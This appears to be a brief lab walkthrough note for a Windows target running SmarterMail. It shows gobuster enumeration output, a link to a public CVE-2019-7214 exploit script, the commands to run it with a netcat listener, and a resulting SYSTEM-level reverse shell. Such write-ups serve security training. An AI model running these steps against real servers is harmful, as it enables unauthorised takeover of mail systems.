4 :9998 IIS 10

Exploit: https://github.com/devzspy/CVE-2019-7214/blob/master/cve-2019-7214.py

http://192.168.71.65:9998/interface/root#/login
SmarterMail Login Page

$ gobuster dir -u http://192.168.71.65:9998 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x asp,apsx,html,txt -t 80
===============================================================
/download             (Status: 500) [Size: 36]
/services             (Status: 301) [Size: 158] [--> http://192.168.71.65:9998/services/]
/reports              (Status: 301) [Size: 157] [--> http://192.168.71.65:9998/reports/]
/scripts              (Status: 301) [Size: 157] [--> http://192.168.71.65:9998/scripts/]
/api                  (Status: 302) [Size: 132] [--> /interface/root]
/interface            (Status: 301) [Size: 159] [--> http://192.168.71.65:9998/interface/]

SmarterMail Exploit
Using https://raw.githubusercontent.com/devzspy/CVE-2019-7214/master/cve-2019-7214.py

$ python3 cve-2019-7214.py 
$ nc -lvnp 9998

listening on [any] 9998 ...
connect to [192.168.49.71] from (UNKNOWN) [192.168.71.65] 49740

PS C:\Windows\system32> whoami
nt authority\system

PreviousALGERNON Next3 :80 IIS 10

Last updated 3 years ago